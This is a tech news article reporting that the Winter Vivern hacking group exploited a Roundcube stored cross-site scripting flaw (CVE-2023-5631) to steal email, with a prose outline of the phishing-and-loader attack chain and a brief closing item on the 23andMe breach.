The threat actor known as Winter Vivern targeted Roundcube webmail software on Oct. 11, exploiting a zero-day vulnerability to gain unauthorized access to email messages.
What is Winter Vivern Hacking Group
Winter Vivern exploits a zero-day flaw in the Roundcube email server.
According to ESET Research, Winter Vivern is a Russian hacking group that has been operating since 2020. The notorious cybercriminals reportedly target governments across Central Asia and Europe.
The operations of the threat actors involve launching phishing campaigns on websites, using customer PowerShell backdoors and other forms of malicious codes and documents.
Previous reports claimed that Winter Vivern is connected to MoustachedBouncer which is based in Belarus.
Recent months have witnessed the group's involvement in attacks on Ukraine, Poland, and various government entities across Europe and India.
Interestingly, this incident isn't Winter Vivern's first encounter with Roundcube. They previously targeted a different flaw, CVE-2020-35730, making them the second nation-state group, after APT28, to exploit this open-source webmail software.
The New Vulnerability: CVE-2023-5631
The specific vulnerability in this attack is CVE-2023-5631, boasting a CVSS score of 5.4. This stored cross-site scripting flaw enables a remote attacker to load arbitrary JavaScript code into the software. Fortunately, a patch was released promptly on October 14, 2023.
Related Article: Go-Based Backdoor Hits Russian Orgs: New Password-Stealing Variant?
Winter Vivern's Attack Sequence
According to The Hacker News, Winter Vivern's attack typically commences with a phishing message that includes a Base64-encoded payload within the HTML source code. Upon decoding, this payload launches a JavaScript injection from a remote server, exploiting the XSS vulnerability.
"By sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user's browser window. No manual intervention other than viewing the message in a web browser is required," ESET said.
The second-stage JavaScript, named checkupdate.js, serves as a loader, facilitating the execution of a final JavaScript payload. This payload enables the threat actor to exfiltrate email messages to a command-and-control (C2) server.
A Persistent Threat to European Governments
Despite Winter Vivern's relatively unsophisticated toolset, the group poses a significant threat to European governments due to its persistence, per Bleeping Computer. It regularly conducts phishing campaigns, targeting internet-facing applications known to have vulnerabilities. The concerning reality is that many of these applications remain unpatched, creating ample opportunities for exploitation.
As the security landscape continues to evolve, vigilance and timely updates are essential to mitigate the risks posed by threat actors like Winter Vivern.
Meanwhile, an early report by Tech Times said that gene-testing firm 23andMe suffered a data breach. The unknown hacker claimed that millions of data, particularly from users with Jewish ancestry were stolen.
The hacker also posted that even the personal information of the popular names in the tech industry including Meta CEO Mark Zuckerberg and Tesla boss Elon Musk were also contained in the database.
Read Also: Akira Ransomware Steals Personal Information of Employees; BHI Energy Explains About the Attack
